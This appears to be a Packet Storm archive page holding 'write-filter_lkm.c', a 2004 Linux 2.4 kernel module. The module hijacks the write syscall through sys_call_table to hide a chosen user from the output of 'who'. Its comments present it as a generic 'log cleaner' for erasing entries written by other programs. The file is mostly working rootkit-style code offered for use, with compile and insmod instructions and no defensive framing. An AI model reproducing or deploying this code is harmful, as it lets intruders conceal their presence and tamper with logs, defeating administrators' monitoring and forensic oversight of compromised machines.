what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

write-filter_lkm.c

write-filter_lkm.c
Posted Jul 26, 2004
Authored by Bugghy | Site vaida.bogdan.googlepages.com

Linux kernel module that will filter writes for the 2.4 kernel series.

tags | kernel
systems | linux
SHA-256 | 0ecb743a9551bc4043cfabca5eea5394543c2ad4e7287889998590e34e3126a6

write-filter_lkm.c

Change Mirror Download
//                      who filter
// v1.0a (25 Jul)
// by bugghy (bugghy@rootshell.be)

// gcc -isystem /lib/modules/`uname -r`/build/include -O2 -DMODULE -D__KERNEL__ -c who_filter.c
// insmod who_filter.o

// Replacing write is simple :) but you should try writev

// Uses:
// 1. utmp filterring (why would anyone need to check if root is on)
// 2. actually it's a generic write syscall filter:
// strace program
// if it uses write() => #define FILTER "program" && #define USER="somestring"
// now you've got a generic "log cleaner" (ps: syslogd uses writev)

#if CONFIG_MODVERSIONS==1 // was it defined in kernel ?
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h> // sys_call_table
#include <linux/mm.h> // current->comm
#include <asm/uaccess.h> // copy_??_user

#define USER "bugghy"
#define FILTER "who" // "w" is not filterred (try to compare the output)

extern void *sys_call_table[];

ssize_t (*o_write)(int, const void *, size_t);

ssize_t h_write(int fd, const void *buf, size_t count)
{
unsigned int ret;
char *tmp;
char user[]=USER;

if(!strcmp(FILTER, current->comm)) // command is $FILTER
{
// printk("<1>Command: %s\n", current->comm);
tmp=(char *) kmalloc(500, GFP_KERNEL);
memset(tmp, 0, 500);
copy_from_user(tmp, buf, strlen(buf)-1);

if(strstr(tmp, user) != NULL) // user is $USER
{
// printk("Buffer: %s\n", tmp);
kfree(tmp);
return count;
}

kfree(tmp);
}
ret = o_write(fd, buf, count);
return ret;
}

int init_module(void)
{
o_write = sys_call_table[SYS_write];
sys_call_table[SYS_write] = h_write;
return 0;
}

void cleanup_module(void)
{
sys_call_table[SYS_write] = o_write;
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close